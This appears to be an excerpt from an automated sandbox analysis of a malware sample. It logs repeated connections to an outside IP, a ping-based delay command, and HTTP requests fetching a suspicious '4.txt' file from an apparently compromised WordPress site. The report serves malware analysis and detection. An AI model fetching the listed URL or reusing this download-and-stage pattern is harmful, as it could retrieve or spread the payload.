Source: global trafficTCP traffic: 192.168.2.22:49190 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49191 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49193 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49194 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49195 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49198 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49196 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49200 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49199 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49203 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49204 -> 187.45.240.69:80

Networking

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 8 127.0.0.1
Source: Joe Sandbox ViewASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox ViewIP Address: 104.18.11.207 104.18.11.207
Source: Joe Sandbox ViewIP Address: 187.45.240.69 187.45.240.69
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/certificates/4.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/bootstrap.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: netdna.bootstrapcdn.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: translate.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/camera.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/bootstrap/css/responsive.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/flexslider.css?ver=2.2.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.carousel.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/owl-carousel/owl.theme.css?ver=1.24 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/css/parallax.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/css/caption.css?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/main-style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.css?ver=1.5.8 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/jquery.elastislide.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.flashblue-plugins.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/css/style.css HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/custom.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
